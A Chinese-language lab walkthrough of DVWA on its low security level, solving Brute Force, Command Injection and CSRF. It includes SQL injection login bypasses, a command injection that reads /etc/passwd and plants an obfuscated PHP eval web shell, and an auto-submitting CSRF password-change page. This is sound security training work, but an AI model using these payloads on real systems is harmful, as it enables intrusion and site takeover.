谜团靶机writeup - DVWA-低等级靶场通关指南

本文详细介绍了DVWA漏洞挑战,包括BruteForce暴力破解、CommandInjection命令注入、CSRF跨站请求伪造、FileInclusion文件包含、FileUpload文件上传、InsecureCAPTCHA验证码、SQLInjection注入攻击、弱SessionID管理及XSS跨站脚本等。通过实战演练,学习者可提升安全意识和防护技巧。

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

谜团靶机平台地址:https://mituan.zone/

注册选择靶机

注册登录之后可以看到有很多靶机,选择本次的目标-DVWA。
在这里插入图片描述
点击开始练习
开始练习
点击打开按钮
在这里插入图片描述
在新打开的页面中输入admin password登录,进行靶场初始化。
在这里插入图片描述
初始化完成之后,重新登录,开始靶场练习。。。

Brute Force

输入admin、admin之后抓包,发送到爆破模块,添加字典然后进行暴力破解,成功得到密码password。
在这里插入图片描述
经过查看源码,发现也可以通过注入的方式登录,

  • admin' and 1=1 -- qwe or不行
  • admin' or '1'='1 and不行
  • admin'#
    在这里插入图片描述

Command Injection

输入127.0.0.1 | cat /etc/passwd或者| echo '<?php $a="6576616c28245f52455"."1554553545b385d293b";$b="a";define("a",PACK("H*",$$b));eval(a);?>' > ../../mituan.php,之后访问地址http://b20b47d25e6e4146a001ba46fd059ea4.app.mituan.zone/mituan.php?8=phpinfo();
在这里插入图片描述

CSRF

点击Change之后,用Burp抓包,然后制作CSRF Poc。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id='a' action="http://b20b47d25e6e4146a001ba46fd059ea4.app.mituan.zone/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="admin123" />
      <input type="hidden" name="password&#95;conf" value="admin123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
<script>
    function abc(){
        document.getElementById('a').submit();
    }
    setTimeout(abc, 500);
</script>
</html>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值